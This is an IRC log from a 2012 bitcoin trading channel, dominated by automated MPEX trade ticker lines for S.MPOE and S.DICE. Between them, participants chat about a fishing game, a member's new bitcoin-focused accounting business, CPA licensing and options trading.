theory Nov 25 18:34:19 so go ahead. Nov 25 18:34:26 click on me, put .2 in, have fun Nov 25 18:35:12 so basically the forum wants gigavps to buyback bonds at 1.05 btc each + all the dividends Nov 25 18:35:40 ? Nov 25 18:35:43 whats this biggest fish thing? Nov 25 18:35:54 [MPEX] [S.MPOE] 1619 @ 0.00053456 = 0.8655 BTC [+] Nov 25 18:35:54 some game ukto Nov 25 18:35:55 [MPEX] [S.MPOE] 9381 @ 0.00053461 = 5.0152 BTC [+] Nov 25 18:35:59 http://78.47.168.188/ Nov 25 18:36:20 i love it how the link is direct ip lol Nov 25 18:36:22 Error: Not Found Nov 25 18:36:23 The requested URL / was not found on this server. Nov 25 18:36:28 kik Nov 25 18:36:38 works here Nov 25 18:36:39 oh Nov 25 18:36:43 oh Nov 25 18:36:44 i see we have hooks now Nov 25 18:36:54 it was freom the link on polimedia Nov 25 18:36:54 what the point of those Nov 25 18:37:18 i think just decor Nov 25 18:37:35 what is* Nov 25 18:37:43 damn a whole word missing there. Nov 25 18:37:47 i tried clicking hte how it works on polimedia and got taht 404 hehe Nov 25 18:37:59 o that was old version Nov 25 18:38:06 i should update the link Nov 25 18:38:10 dont see one on the actual game Nov 25 18:38:11 ahh Nov 25 18:39:14 [MPEX] [S.MPOE] 369 @ 0.00053461 = 0.1973 BTC [+] Nov 25 18:39:15 [MPEX] [S.MPOE] 11150 @ 0.00053468 = 5.9617 BTC [+] Nov 25 18:39:16 [MPEX] [S.MPOE] 1831 @ 0.00053519 = 0.9799 BTC [+] Nov 25 18:43:31 [MPEX] [S.MPOE] 2345 @ 0.00052813 = 1.2385 BTC [-] Nov 25 18:43:32 [MPEX] [S.MPOE] 11495 @ 0.00052793 = 6.0686 BTC [-] Nov 25 18:50:30 [MPEX] [S.MPOE] 308 @ 0.00052793 = 0.1626 BTC [-] Nov 25 18:50:31 [MPEX] [S.MPOE] 14838 @ 0.00052609 = 7.8061 BTC [-] Nov 25 18:56:52 [MPEX] [S.MPOE] 26650 @ 0.00052609 = 14.0203 BTC [-] Nov 25 19:05:56 [MPEX] [S.MPOE] 2800 @ 0.00052683 = 1.4751 BTC [+] Nov 25 19:05:56 [MPEX] [S.MPOE] 2345 @ 0.00052803 = 1.2382 BTC [+] Nov 25 19:05:58 [MPEX] [S.MPOE] 9655 @ 0.00052813 = 5.0991 BTC [+] Nov 25 19:07:30 [MPEX] [S.MPOE] 396 @ 0.00052813 = 0.2091 BTC [+] Nov 25 19:07:32 [MPEX] [S.MPOE] 22558 @ 0.00052879 = 11.9284 BTC [+] Nov 25 19:07:33 [MPEX] [S.MPOE] 4973 @ 0.00053067 = 2.639 BTC [+] Nov 25 19:14:01 [MPEX] [S.MPOE] 2345 @ 0.00052638 = 1.2344 BTC [-] Nov 25 19:14:03 [MPEX] [S.MPOE] 12282 @ 0.00052609 = 6.4614 BTC [-] Nov 25 19:14:04 [MPEX] [S.MPOE] 1315 @ 0.00052452 = 0.6897 BTC [-] Nov 25 19:28:14 [MPEX] [S.MPOE] 29303 @ 0.00052743 = 15.4553 BTC [+] Nov 25 19:32:08 [MPEX] [S.MPOE] 5197 @ 0.00052743 = 2.7411 BTC [+] Nov 25 19:35:51 [MPEX] [S.MPOE] 2255 @ 0.00052452 = 1.1828 BTC [-] Nov 25 19:35:52 [MPEX] [S.MPOE] 11500 @ 0.00052431 = 6.0296 BTC [-] Nov 25 19:35:54 [MPEX] [S.MPOE] 7450 @ 0.00052393 = 3.9033 BTC [-] Nov 25 19:35:55 [MPEX] [S.MPOE] 4095 @ 0.00052323 = 2.1426 BTC [-] Nov 25 19:47:23 [MPEX] [S.MPOE] 6992 @ 0.00052498 = 3.6707 BTC [+] Nov 25 19:47:25 16:22 < mircea_popescu> so i've been top fish for ~2 hours now, smickles take that! << oh noes, i've been doing other things and my fish has been invisible for who knows how long Nov 25 19:49:08 oh mircea_popescu, d'ja !ticker s.dice recently? Nov 25 19:52:47 [MPEX] [S.MPOE] 23305 @ 0.00052323 = 12.1939 BTC [-] Nov 25 19:52:48 [MPEX] [S.MPOE] 4745 @ 0.00052113 = 2.4728 BTC [-] Nov 25 19:55:41 [MPEX] [S.MPOE] 9400 @ 0.00052113 = 4.8986 BTC [-] Nov 25 20:03:27 [MPEX] [S.MPOE] 16731 @ 0.00052113 = 8.719 BTC [-] Nov 25 20:03:28 [MPEX] [S.MPOE] 8900 @ 0.00052078 = 4.6349 BTC [-] Nov 25 20:03:30 [MPEX] [S.MPOE] 3569 @ 0.0005202 = 1.8566 BTC [-] Nov 25 20:21:55 [MPEX] [S.MPOE] 21200 @ 0.00052149 = 11.0556 BTC [+] Nov 25 20:21:56 [MPEX] [S.MPOE] 3996 @ 0.00052314 = 2.0905 BTC [+] Nov 25 20:24:03 [MPEX] [S.MPOE] 16900 @ 0.0005202 = 8.7914 BTC [-] Nov 25 20:31:30 [MPEX] [S.MPOE] 13304 @ 0.00052314 = 6.9599 BTC [+] Nov 25 20:31:32 [MPEX] [S.MPOE] 8000 @ 0.00052316 = 4.1853 BTC [+] Nov 25 20:31:33 [MPEX] [S.MPOE] 4396 @ 0.00052498 = 2.3078 BTC [+] Nov 25 20:34:54 [MPEX] [S.MPOE] 7311 @ 0.0005202 = 3.8032 BTC [-] Nov 25 20:37:25 fishgame working? Nov 25 20:40:00 [MPEX] [S.DICE] 3950 @ 0.00339999 = 13.43 BTC [+] Nov 25 20:47:22 [MPEX] [S.MPOE] 3900 @ 0.00051839 = 2.0217 BTC [-] Nov 25 20:48:01 hmm, did Theymos ban images from sigs? Nov 25 20:48:16 sort've, i think you have to pay for 'em Nov 25 20:48:39 ah. I remember I used to see them, and noticed none of the pages I looked at lately had any Nov 25 20:48:57 http://www.reddit.com/r/Bitcoin/comments/13qosb/comparison_of_bitcoin_and_the_sec_definition_of_a/c76iqhn << i guess I f'd up a little Nov 25 20:50:03 [MPEX] [S.MPOE] 18319 @ 0.00052 = 9.5259 BTC [+] Nov 25 20:51:33 [MPEX] [S.MPOE] 28521 @ 0.00051839 = 14.785 BTC [-] Nov 25 20:51:34 [MPEX] [S.MPOE] 2900 @ 0.00051789 = 1.5019 BTC [-] Nov 25 20:51:36 [MPEX] [S.MPOE] 20842 @ 0.00051788 = 10.7937 BTC [-] Nov 25 20:58:32 [MPEX] [S.MPOE] 4758 @ 0.00051788 = 2.4641 BTC [-] Nov 25 20:58:33 [MPEX] [S.MPOE] 2691 @ 0.00051614 = 1.3889 BTC [-] Nov 25 21:04:26 [MPEX] [S.MPOE] 4170 @ 0.00052 = 2.1684 BTC [+] Nov 25 21:10:43 [MPEX] [S.MPOE] 815 @ 0.00052498 = 0.4279 BTC [+] Nov 25 21:10:45 [MPEX] [S.MPOE] 17685 @ 0.0005285 = 9.3465 BTC [+] Nov 25 21:14:33 when does biggest fish ip on mpex? Nov 25 21:14:37 *ipo Nov 25 21:14:51 [MPEX] [S.MPOE] 2345 @ 0.00052843 = 1.2392 BTC [-] Nov 25 21:14:52 [MPEX] [S.MPOE] 9915 @ 0.0005285 = 5.2401 BTC [+] Nov 25 21:14:54 [MPEX] [S.MPOE] 6640 @ 0.00052903 = 3.5128 BTC [+] Nov 25 21:21:47 pigeons: i dunno if they will ipo if freemoney buys them outright Nov 25 21:22:30 :o Nov 25 21:22:36 A brand new car! Nov 25 21:22:48 :D Nov 25 21:22:59 After 100 monthly installments of 50btc. Nov 25 21:23:00 :P Nov 25 21:23:06 :( Nov 25 21:23:21 ok i'll wait for the Satoshi Fishing clone Nov 25 21:23:32 That better be a self driving car for that price Nov 25 21:23:49 smickles: no. just interest :P Nov 25 21:23:59 7% a week Nov 25 21:25:30 Sup Jay-Woo :P Nov 25 21:26:54 smickles Nov 25 21:27:10 thestringpuller: heh, just as I would've left Nov 25 21:27:15 nvm Nov 25 21:27:17 snickles :P Nov 25 21:27:22 oh it's np Nov 25 21:27:27 hahaha Nov 25 21:27:52 "Don't get your snickers in a wad" :P Nov 25 21:28:07 Why do all games have shitty endings these days (random) Nov 25 21:28:21 thestringpuller: I've got a link for you to have a gander at :) Nov 25 21:28:26 I will pay someone 100000 btc to make a good game Nov 25 21:28:40 does it have to be a story game Nov 25 21:28:44 yes Nov 25 21:28:44 or just multiplayer Nov 25 21:28:50 i'll work that later Nov 25 21:28:57 i want something with a story that compares to GTA IV or Alan Wake Nov 25 21:29:02 [MPEX] [S.MPOE] 2345 @ 0.0005214 = 1.2227 BTC [-] Nov 25 21:29:03 [MPEX] [S.MPOE] 19201 @ 0.00052109 = 10.0054 BTC [-] Nov 25 21:29:17 thestringpuller: http://starpas.azcc.gov/scripts/cgiip.exe/WService=wsbroker1/names-detail.p?name-id=L18030781&type=PENDING%20CORP. Nov 25 21:29:54 are you trying to hack me Nov 25 21:30:01 that link looks sketchy Nov 25 21:30:11 i'll open it with curl Nov 25 21:30:19 heh, i wonder how curl will do Nov 25 21:30:59 NICE! Nov 25 21:31:03 smickles accounting corp Nov 25 21:31:06 still pending tho Nov 25 21:31:10 Congratulations sir! Nov 25 21:31:31 why does it expire in march? Nov 25 21:31:42 pi-day in fact Nov 25 21:32:33 they got it back on the 13th Nov 25 21:32:33 so this tuesday, it'll be 2 weeks worth of processing a few forms Nov 25 21:32:57 do you have a cpa license? Nov 25 21:33:02 lol, didn't notice pi day Nov 25 21:33:17 Ukto: no, i'm a little ways off from being a cpa yet Nov 25 21:33:24 ahh Nov 25 21:33:27 well good luck with it! :) Nov 25 21:33:36 thanks! :D Nov 25 21:34:44 yeah, I'll be providing bookeeping, payroll, accounts receivable, accounts payable, consulting and related services. All custom taylored to bitcoin businesses Nov 25 21:35:10 once weex get going a bit further Nov 25 21:35:20 I believe my plan for A/P is the most secure solution to date, private keys will never even be on a HD Nov 25 21:35:24 I plan to hire a cpa firm to do a weekly/monthly audit of all accounts Nov 25 21:35:37 usd, aud, cad, btc, etc Nov 25 21:35:48 and have them post on the same basis that all looks right with the world Nov 25 21:35:49 aw, too bad i'm not a cpa, I can't do public audits :| Nov 25 21:37:12 when will you get your cpa? Nov 25 21:37:41 thestringpuller: it takes years, the requirements are harsh Nov 25 21:37:47 heh Nov 25 21:38:04 Why don't you do it kingpin style and hire a CPA with an "offer they can't refuse"? Nov 25 21:38:10 why setting up the llc now then ? Nov 25 21:38:41 Ukto: accounting isn't just what cpas do Nov 25 21:39:11 "Certified Public Accountant' primary purpose. :P Nov 25 21:39:13 [MPEX] [S.MPOE] 2345 @ 0.00052459 = 1.2302 BTC [+] Nov 25 21:39:15 to Account Nov 25 21:39:15 [MPEX] [S.MPOE] 20336 @ 0.00052472 = 10.6707 BTC [+] Nov 25 21:39:15 [MPEX] [S.MPOE] 6319 @ 0.00052903 = 3.3429 BTC [+] Nov 25 21:39:29 really, a CPA licens is so that you can do Audits on publicly traded companies and such like that Nov 25 21:40:30 almost every other aspect of accounting can be done by accountants who are not CPAs Nov 25 21:41:19 could you help me become publicly traded Nov 25 21:41:22 if I had the volume that is Nov 25 21:41:23 Oh, and a CPA can sign your 1040 as a preparer, wehre oters cant Nov 25 21:41:27 [MPEX] [S.MPOE] 2345 @ 0.00052133 = 1.2225 BTC [-] Nov 25 21:41:28 [MPEX] [S.MPOE] 10229 @ 0.00052109 = 5.3302 BTC [-] Nov 25 21:42:05 smickles: I have had my own s-corps for the last 10 years. Nov 25 21:42:19 I generally file about 300 pages worth in taxes a year to the irs Nov 25 21:42:26 just for the businesses :P Nov 25 21:42:33 I have a geat cpa Nov 25 21:43:05 my personal/family taxes re bloated out to about 38 pages yearly Nov 25 21:43:07 what is a geat Nov 25 21:43:07 I'm sure you do. Most people who are CPAs are excellent accountants Nov 25 21:43:38 Everyone should always have a cpa do their taxes Nov 25 21:43:43 if a cpa is not singing off on them Nov 25 21:43:56 then you are personally responsible for any mistakes, and could goto jail Nov 25 21:44:07 if a cpa signs, and tehres a mistake, there is a simple procedure to fix it Nov 25 21:44:41 ya know, a CPA can represent you in place of a lawyer in some cases? Nov 25 21:44:54 yup, just depends Nov 25 21:45:14 to get an EVSSL cert, you have to provide a letter from a lawyer, or cpa Nov 25 21:46:33 I plan to become a CPA, it just takes time, and I have to work under a CPA for at least 2 years before I can even attempt the exams Nov 25 21:47:06 so I'll have to wait until my daughter and coming son are a little older Nov 25 21:47:45 children rule though Nov 25 21:48:14 I have 4 :P Nov 25 21:49:43 [MPEX] [S.MPOE] 15750 @ 0.00051917 = 8.1769 BTC [-] Nov 25 21:49:44 [MPEX] [S.MPOE] 19950 @ 0.00051677 = 10.3096 BTC [-] Nov 25 21:52:10 Ukto: i'm willing to bet you are older than i am tho :P Nov 25 21:52:25 just turned 32 Nov 25 21:52:30 you're old as shit Nov 25 21:52:31 jk Nov 25 21:52:31 jk Nov 25 21:52:37 lol Nov 25 21:52:49 i estimated you being in your late 30's mr. smickles Nov 25 21:52:50 [MPEX] [S.MPOE] 15200 @ 0.00051677 = 7.8549 BTC [-] Nov 25 21:52:51 [MPEX] [S.MPOE] 7100 @ 0.00051628 = 3.6656 BTC [-] Nov 25 21:53:04 we would have gone to school together Nov 25 21:53:05 lol Nov 25 21:53:10 heh Nov 25 21:53:30 I went to a highschool that Jay Leno once called "fort fertile" Nov 25 21:53:50 not at all because of me tho :/ Nov 25 21:53:55 lol, too bad Nov 25 21:53:56 :P Nov 25 21:53:59 [MPEX] [S.MPOE] 14826 @ 0.00051971 = 7.7052 BTC [+] Nov 25 21:54:00 [MPEX] [S.MPOE] 12324 @ 0.00052903 = 6.5198 BTC [+] Nov 25 21:56:26 looks like icbit futures might finally close above 12 Nov 25 21:57:31 [MPEX] [S.MPOE] 2345 @ 0.00052875 = 1.2399 BTC [-] Nov 25 21:57:33 [MPEX] [S.MPOE] 1367 @ 0.00052903 = 0.7232 BTC [+] Nov 25 21:57:34 [MPEX] [S.MPOE] 2888 @ 0.00052987 = 1.5303 BTC [+] Nov 25 21:57:58 the price is going up though Nov 25 21:58:18 thestringpuller: the futures market is a funny thing Nov 25 21:58:22 [MPEX] [S.MPOE] 2345 @ 0.00051649 = 1.2112 BTC [-] Nov 25 21:58:24 [MPEX] [S.MPOE] 3100 @ 0.00051628 = 1.6005 BTC [-] Nov 25 21:58:24 [MPEX] [S.MPOE] 16809 @ 0.00051614 = 8.6758 BTC [-] Nov 25 21:58:25 [MPEX] [S.MPOE] 2972 @ 0.00051565 = 1.5325 BTC [-] Nov 25 22:03:04 [MPEX] [S.DICE] 1800 @ 0.00338509 = 6.0932 BTC [-] Nov 25 22:07:14 [MPEX] [S.MPOE] 1400 @ 0.00051638 = 0.7229 BTC [+] Nov 25 22:07:16 [MPEX] [S.MPOE] 12439 @ 0.00051565 = 6.4142 BTC [-] Nov 25 22:15:15 [MPEX] [S.MPOE] 2345 @ 0.00052956 = 1.2418 BTC [+] Nov 25 22:15:17 [MPEX] [S.MPOE] 10450 @ 0.00052956 = 5.5339 BTC [+] Nov 25 22:24:19 [MPEX] [S.MPOE] 2345 @ 0.00052609 = 1.2337 BTC [-] Nov 25 22:24:20 [MPEX] [S.MPOE] 4155 @ 0.00052576 = 2.1845 BTC [-] Nov 25 22:26:15 [MPEX] [S.MPOE] 2445 @ 0.00052576 = 1.2855 BTC [-] Nov 25 22:26:17 [MPEX] [S.MPOE] 29750 @ 0.0005184 = 15.4224 BTC [-] Nov 25 22:26:17 [MPEX] [S.MPOE] 394 @ 0.00051565 = 0.2032 BTC [-] Nov 25 22:26:18 [MPEX] [S.MPOE] 2661 @ 0.00051557 = 1.3719 BTC [-] Nov 25 22:29:04 http://closeuptvnews.com/closeuptalkradio/pressreleases/StephaneRancourtPR.pdf&ct=ga&cad=CAcQARgBIAEoATAAOABA4brChQVIAlgAYgVlbi1VUw&cd=2Z-RgDku6TY&usg=AFQjCNFApu1dWyFMHK0QfOyVKTNhuLCIkw Nov 25 22:29:16 er Nov 25 22:29:17 http://www.google.com/url?sa=X&q=http://closeuptvnews.com/closeuptalkradio/pressreleases/StephaneRancourtPR.pdf&ct=ga&cad=CAcQARgBIAEoATAAOABA4brChQVIAlgAYgVlbi1VUw&cd=2Z-RgDku6TY&usg=AFQjCNFApu1dWyFMHK0QfOyVKTNhuLCIkw Nov 25 22:30:50 Software to handle puts and calls on arbitrary pairs of assets is badly needed. That is really coming home to people today as they ran around negotiating large puts and calls to try to prevent a tipping point that could trigger panic selling if they don't get enough, and the right, puts and calls worked out and in place Nov 25 22:35:39 [MPEX] [S.MPOE] 24882 @ 0.00051557 = 12.8284 BTC [-] Nov 25 22:36:39 knotwork: didn't that just happen in october? Nov 25 22:36:48 [MPEX] [S.MPOE] 9897 @ 0.00051557 = 5.1026 BTC [-] Nov 25 22:36:50 [MPEX] [S.MPOE] 153 @ 0.00051355 = 0.0786 BTC [-] Nov 25 22:37:40 well remember when bitcoin skyrocketed over $30, but tipped when it topped out? Nov 25 22:38:41 [MPEX] [S.MPOE] 12147 @ 0.00051355 = 6.2381 BTC [-] Nov 25 22:38:43 easy apps to handle options maybe could have helped there, for example maybe if lots of options had been available for people to secure themselves a peak price for a few months so they need not panic... Nov 25 22:38:43 [MPEX] [S.MPOE] 18975 @ 0.0005135 = 9.7437 BTC [-] Nov 25 22:41:31 a significant amount of secure debt was sniped today while everyone was already worried about skyrockets, massive players in the secured debt arena finally realised all their debtors would be sniped if they didn't cut their rates across the board, and everything wobbled Nov 25 22:42:08 everyone is running around trying to work out options bundles tht they hope can prevent the flattening out of the curves from turning into an actual downtick Nov 25 22:43:33 the secure interest rates of course are also key in many.most (all?) options pricing schemes so its hectic, then all the options will all have to be manually adminitered too Nov 25 22:47:34 yeah, gl with comming up with a 'risk free rate' in bitcoinland Nov 25 22:47:57 my options been up for months Nov 25 22:47:58 I suggest yo ujust assume there isn't one Nov 25 22:48:01 just havent promoted it :P Nov 25 22:48:27 Ukto: how do they compare to mpex's options? Nov 25 22:48:43 which is proper usage of your / you're? "claim your crap" or you're ? Nov 25 22:48:47 well considering t-bills are passed off as risk-free ... Nov 25 22:48:48 should be you're? right Nov 25 22:49:02 claim your crap Nov 25 22:49:08 you're is "you are" Nov 25 22:49:14 oh, good point Nov 25 22:49:16 must be tired Nov 25 22:49:21 claim you are crap Nov 25 22:49:29 oh, right Nov 25 22:49:30 that does make sense too Nov 25 22:49:34 :P Nov 25 22:49:37 just wrong context Nov 25 22:49:51 smickles: mine is like an OTC options system Nov 25 22:50:12 knotwork: if you want to use tbils, then we'd need a good way to convert btc into tbills Nov 25 22:50:28 Ukto: do you work them out individually then? Nov 25 22:50:28 you pick call/put, you specify the deadline for exection, the strike price, and the option price yoiu want Nov 25 22:50:48 it gets posted on the list, and anyone can buy it Nov 25 22:50:52 no no i merely meant if t-bills are risk-free then obviously its a loose term of art to being with Nov 25 22:51:06 you can also make it 'breakable' so you can post 100 btc, and let multiple ppl pick outof it Nov 25 22:51:07 to begin with Nov 25 22:51:11 Ukto: where's the list? Nov 25 22:51:16 ;;view Ukto Nov 25 22:51:16 Error: No orders found matching these criteria. Nov 25 22:51:18 option holders can also re-write the options back into the board Nov 25 22:51:20 er Nov 25 22:51:25 smickles: its all on weex Nov 25 22:51:32 oh, that makes sense Nov 25 22:51:38 I think the last option that was for sale got bought last night Nov 25 22:51:54 there is only one person writing options so far... seems to be doing good Nov 25 22:52:01 and about 3~8 ppl randomly buying them Nov 25 22:52:39 smickles: you dont have a weex accnt do you? Nov 25 22:53:16 when i said "arbitrary assets" I meant quite arbitrary. I have created several plots now, showing things in terms of different assets like wht does it look like if you think in litecoin, what does it look like if you think in devcoin, wht does it look like if you think in bitcoin etc Nov 25 22:54:08 Ukto: nope Nov 25 22:54:19 smickles: want me to pm you an invite code? :) Nov 25 22:54:51 it couldn't hurt, I could get to it sometime soon :) Nov 25 22:55:00 basically look at the [PLOT] links off of http://galaxies.mygamesonline.org/digitalisassets.html and if you understand logarithmic scale charts you will see plenty of skyrockets Nov 25 22:55:03 considering copying the options code into the new asset site, so ppl can trade options on assets.. but I just dont think they vary enough in price to be worth using. Nov 25 22:55:23 [MPEX] [S.MPOE] 24200 @ 0.00052758 = 12.7674 BTC [+] Nov 25 22:55:25 [MPEX] [S.MPOE] 881 @ 0.0005135 = 0.4524 BTC [-] Nov 25 22:55:26 [MPEX] [S.MPOE] 1119 @ 0.00051334 = 0.5744 BTC [-] Nov 25 22:55:52 if you could write an option for whatever you wanted, that would open up a lot of interesting possibilities Nov 25 22:56:04 i had to change all the plots to use logarithmic scale because otherwise all the tiny valued assets tended to vanish into the y-axis on the bottom, using log for X lets you see the tiny stuff as well as the skyrocketed stuff Nov 25 22:56:06 define "whatever you wanted" Nov 25 22:56:09 suppose s.mpoe options on weex Nov 25 22:56:22 that would be on the new asset site Nov 25 22:56:23 not weex Nov 25 22:56:33 oh Nov 25 22:56:40 weex doesnt touch assets, bonds of any kinds Nov 25 22:56:45 just btc/usd/aud/cad Nov 25 22:57:10 [MPEX] [S.MPOE] 24181 @ 0.00051334 = 12.4131 BTC [-] Nov 25 22:57:11 [MPEX] [S.MPOE] 1154 @ 0.00051284 = 0.5918 BTC [-] Nov 25 22:57:30 and offering options on mpex assets from the new asset system wouldnt be hard tbh Nov 25 22:57:50 just have to setup an mpex account, and ppl have to xfer the mpex shares to that account Nov 25 22:57:54 to be able to option it out Nov 25 22:58:02 cant be able to post options on somethign that you cant enforce Nov 25 22:59:23 sorry i mixed up x and y axes, its y that is log, x is time Nov 25 23:00:43 well those smooth lines on the plots are of course the folks mostly valued by their compound interest deals theey have/had Nov 25 23:01:31 those are the ones having the interest rates crunch, so they are thinking hey maybe we can set up safe options, where we sell options to make a secure income on our heaps of this and that Nov 25 23:01:58 so pick any pair of this and that you have plenty of on hand and can no longer get as high interest on by loaning it Nov 25 23:02:27 and look into whether selling options both ways on such pairs you can earn as much as you had been making by loaning Nov 25 23:03:21 heh, not much looing into, calls and puts are essentiall the same thing if you know how to look at it Nov 25 23:03:46 basically its like hey I have two things I can sell, but maybe if I sell people the option to buy one or to sell me (at les than i sell it of course) one, i can make money on my inventory without even necesaarily selling it Nov 25 23:03:50 (ack keyboard) Nov 25 23:04:06 and if i do sell some of it, well it was looking like something might have to be sold anyway so what the heck Nov 25 23:07:13 ahh finally the latest sets of numbers are complete and i can plot new plots Nov 25 23:08:14 log scale makes the skyrockets look so un-dramatic! its almost worth not being able to see the low valued assets on non-log scale jsut so you can see how exciting the skyrockets were really looking Nov 25 23:08:51 it has been like oh gosh is Martian BotCoin doing what bitcoin did back when bitcoin topped oout over $30 ??? Nov 25 23:09:35 new plots are uploading right now Nov 25 23:09:44 ok they are up Nov 25 23:10:25 smickles: sent you pm. Nov 25 23:10:38 damn i turned the mousing thing off so i could make the chart bigger, but that turned off the ability to zoom, i can hardly really see if its downticks or just levelled off Nov 25 23:11:42 kind of looks like down a little for t least some of them Nov 25 23:15:19 [MPEX] [S.MPOE] 6750 @ 0.00052547 = 3.5469 BTC [+] Nov 25 23:15:20 [MPEX] [S.MPOE] 11303 @ 0.00051284 = 5.7966 BTC [-] Nov 25 23:18:53 [MPEX] [S.MPOE] 2345 @ 0.00052926 = 1.2411 BTC [+] Nov 25 23:18:55 [MPEX] [S.MPOE] 4650 @ 0.00052956 = 2.4625 BTC [+] Nov 25 23:18:56 [MPEX] [S.MPOE] 6176 @ 0.00052987 = 3.2725 BTC [+] Nov 25 23:20:50 ahh its really clear in http://galaxies.mygamesonline.org/plotsharesinltc.html that shares took a bump in terms of litecoin but recovered Nov 25 23:21:49 since they all did i am guessing they maybe didnt take a bump at all but, rather, litecoin went up briefly then back down Nov 25 23:29:44 [MPEX] [S.MPOE] 2345 @ 0.00052332 = 1.2272 BTC [-] Nov 25 23:29:46 [MPEX] [S.MPOE] 10000 @ 0.000523 = 5.23 BTC [-] Nov 25 23:29:47 [MPEX] [S.MPOE] 1579 @ 0.00051284 = 0.8098 BTC [-] Nov 25 23:30:22 [MPEX] [S.MPOE] 2345 @ 0.0005296 = 1.2419 BTC [+] Nov 25 23:30:24 [MPEX] [S.MPOE] 13786 @ 0.00052987 = 7.3048 BTC [+] Nov 25 23:30:25 [MPEX] [S.MPOE] 20063 @ 0.00053067 = 10.6468 BTC [+] Nov 25 23:31:24 lmao the bot looks like most profitable mpex venture of mine :p Nov 25 23:32:29 and to think it has catched dust unused for few months... Nov 25 23:43:19 [MPEX] [S.MPOE] 12963 @ 0.00052105 = 6.7544 BTC [-] Nov 25 23:45:45 [MPEX] [S.MPOE] 6238 @ 0.00052105 = 3.2503 BTC [-] Nov 25 23:45:46 [MPEX] [S.MPOE] 4062 @ 0.00052557 = 2.1349 BTC [+] Nov 26 00:01:17 so fishgame was hit and run? Nov 26 00:01:33 [MPEX] [S.MPOE] 16800 @ 0.00052116 = 8.7555 BTC [-] Nov 26 00:02:45 hrm? people discussing in forums as if its up, been down over a day Nov 26 00:02:54 it was up a few hours ago ? Nov 26 00:03:18 http://78.47.168.188/ Nov 26 00:03:26 no fish atm Nov 26 00:03:32 not that i quote know how it works Nov 26 00:03:49 google failing Nov 26 00:03:56 *quite Nov 26 00:04:10 using the dns I get a 404 Nov 26 00:04:17 i have no idea Nov 26 00:04:27 all i know is that mircea_popescu had linked this url this morning Nov 26 00:04:30 first I saw of it Nov 26 00:04:38 ;;bc,stats Nov 26 00:04:56 Current Blocks: 209572 | Current Difficulty: 3368767.1405329 | Next Difficulty At Block: 209663 | Next Difficulty In: 91 blocks | Next Difficulty In About: 14 hours, 32 minutes, and 5 seconds | Next Difficulty Estimate: 3421955.55190379 | Estimated Percent Change: 1.57886874195 Nov 26 00:14:10 [MPEX] [S.MPOE] 5050 @ 0.00052116 = 2.6319 BTC [-] Nov 26 00:14:12 [MPEX] [S.MPOE] 15738 @ 0.00052557 = 8.2714 BTC [+] Nov 26 00:15:54 anyone know how to replicate this? Nov 26 00:15:59 http://blockchain.info/unspent?active=1dice1e6pdhLzzWQq7yMidf6j8eAg7pkY Nov 26 00:19:39 [MPEX] [S.MPOE] 14621 @ 0.00052831 = 7.7244 BTC [+] Nov 26 00:19:40 [MPEX] [S.MPOE] 5329 @ 0.00053 = 2.8244 BTC [+] Nov 26 00:20:57 !ticker s.dice Nov 26 00:20:58 [MPEX:S.DICE] 1day: 0.00330708 / 0.00338032 / 0.0034 (48305 shares, 163.29 BTC), 30day: 0.00180002 / 0.00332073 / 0.0034 (985627 shares, 3,273.01 BTC) Nov 26 00:21:07 what about it smickles ? Nov 26 00:21:16 it hit the second tranche Nov 26 00:22:12 ;;halfreward Nov 26 00:22:12 Estimated time of bitcoin block reward halving: Wed Nov 28 21:32:13 2012 UTC | Time remaining: 2 days, 23 hours, 10 minutes, and 0 seconds. Nov 26 00:23:02 [MPEX] [S.MPOE] 11771 @ 0.00053 = 6.2386 BTC [+] Nov 26 00:23:03 [MPEX] [S.MPOE] 4126 @ 0.00053067 = 2.1895 BTC [+] Nov 26 00:23:05 [MPEX] [S.MPOE] 15056 @ 0.00053082 = 7.992 BTC [+] Nov 26 00:25:34 it oh ? Nov 26 00:27:49 ;;rate Bargheimer 1 Runs the biggest fish game. Nice coding. Nov 26 00:27:49 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Nov 26 00:31:08 heh he said he was. Nov 26 00:32:01 is that the correct name? Nov 26 00:32:39 http://wonder-tonic.com/books2barcodes/ Nov 26 00:32:43 [MPEX] [S.MPOE] 17544 @ 0.00053082 = 9.3127 BTC [+] Nov 26 00:32:45 [MPEX] [S.MPOE] 209 @ 0.0005311 = 0.111 BTC [+] Nov 26 00:34:41 pigeons: why? Nov 26 00:36:03 pigeons: lol, i was just thinking of producing the blockchain in qr format for the fun of it Nov 26 00:36:18 :) Nov 26 00:41:16 [MPEX] [S.MPOE] 2345 @ 0.00052714 = 1.2361 BTC [-] Nov 26 00:41:18 [MPEX] [S.MPOE] 555 @ 0.00052708 = 0.2925 BTC [-] Nov 26 00:44:04 ;;calc sqrt(3e9) Nov 26 00:44:04 Error: invalid syntax (, line 1) Nov 26 00:44:59 [MPEX] [S.MPOE] 2345 @ 0.00052776 = 1.2376 BTC [+] Nov 26 00:45:01 [MPEX] [S.MPOE] 19522 @ 0.00052794 = 10.3064 BTC [+] Nov 26 00:45:02 [MPEX] [S.MPOE] 7734 @ 0.0005311 = 4.1075 BTC [+] Nov 26 00:45:15 it's 54772... if a bit is 1x1mm, qr code would be 55x55meters Nov 26 00:45:52 one would probably need spy plane/satellite to scan it :P Nov 26 00:46:36 [MPEX] [S.MPOE] 2345 @ 0.00052737 = 1.2367 BTC [-] Nov 26 00:46:37 [MPEX] [S.MPOE] 4455 @ 0.00052708 = 2.3481 BTC [-] Nov 26 00:49:33 ;;ident Bargheimer Nov 26 00:49:33 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Nov 26 00:51:19 i'm going to make up for the lack of a glbse ticker by pasting semi-random links: http://offbeatchina.com/modeling-for-teen-girl-clothes-on-tmall-72-year-old-grandpa-from-becomes-internet-sensation Nov 26 00:52:01 orly, someone misses glbse ticker? Nov 26 00:52:22 no, i just needed an excuse Nov 26 00:52:37 granted, there were some mysterious symbols, nowadays it's all like s.mpoe Nov 26 00:54:32 lol, ok, segfault when trying to encode the image Nov 26 00:55:12 ahaha the guy kciks ass Nov 26 00:55:45 oh that's a guy??? i read that as "grandma"... *hides* Nov 26 00:59:40 [MPEX] [S.MPOE] 2345 @ 0.00053083 = 1.2448 BTC [+] Nov 26 00:59:42 [MPEX] [S.MPOE] 6007 @ 0.0005311 = 3.1903 BTC [+] Nov 26 00:59:43 [MPEX] [S.MPOE] 1595 @ 0.00053162 = 0.8479 BTC [+] Nov 26 01:02:41 http://offbeatchina.com/wp-content/uploads/2012/11/112.png lol Nov 26 01:10:13 [MPEX] [S.MPOE] 